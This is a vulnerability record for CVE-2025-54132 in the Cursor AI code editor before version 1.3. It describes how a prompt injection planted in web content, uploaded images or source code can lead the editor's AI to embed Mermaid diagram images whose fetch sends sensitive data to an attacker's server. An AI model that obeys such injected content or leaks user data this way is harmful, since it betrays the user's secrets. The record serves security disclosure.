CVE-2025-54132

Published Aug 1, 2025

Last updated 17 days ago

Cursor AI

Overview

AI description

Automated description summarized from trusted sources.

CVE-2025-54132 affects Cursor, a code editor designed for AI programming. Specifically, versions prior to 1.3 are vulnerable. The vulnerability lies in the Mermaid diagram tool, which allows embedding images that Cursor renders in the chat box. An attacker can exploit this by injecting malicious data (e.g., via web sources, image uploads, or source code) to perform a prompt injection. This allows the attacker to exfiltrate sensitive information to a third-party server they control through an image fetch. A malicious AI model could also trigger this exploit. Version 1.3 of Cursor resolves this vulnerability.

Description: Cursor is a code editor built for programming with AI. In versions below 1.3, Mermaid (which is used to render diagrams) allows embedding images which then get rendered by Cursor in the chat box. An attacker can use this to exfiltrate sensitive information to a third-party attacker controlled server through an image fetch after successfully performing a prompt injection. A malicious model (or hallucination/backdoor) might also trigger this exploit at will. This issue requires prompt injection from malicious data (web, image upload, source code) in order to exploit. In that case, it can send sensitive information to an attacker-controlled external server. This is fixed in version 1.3.
Source: security-advisories@github.com
NVD status: Awaiting Analysis

Risk scores

CVSS 3.1

Type: Secondary
Base score: 4.4
Impact score: 3.6
Exploitability score: 0.7
Vector string: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N
Severity: MEDIUM

Weaknesses

security-advisories@github.com: CWE-918

Hype score: Not currently trending

References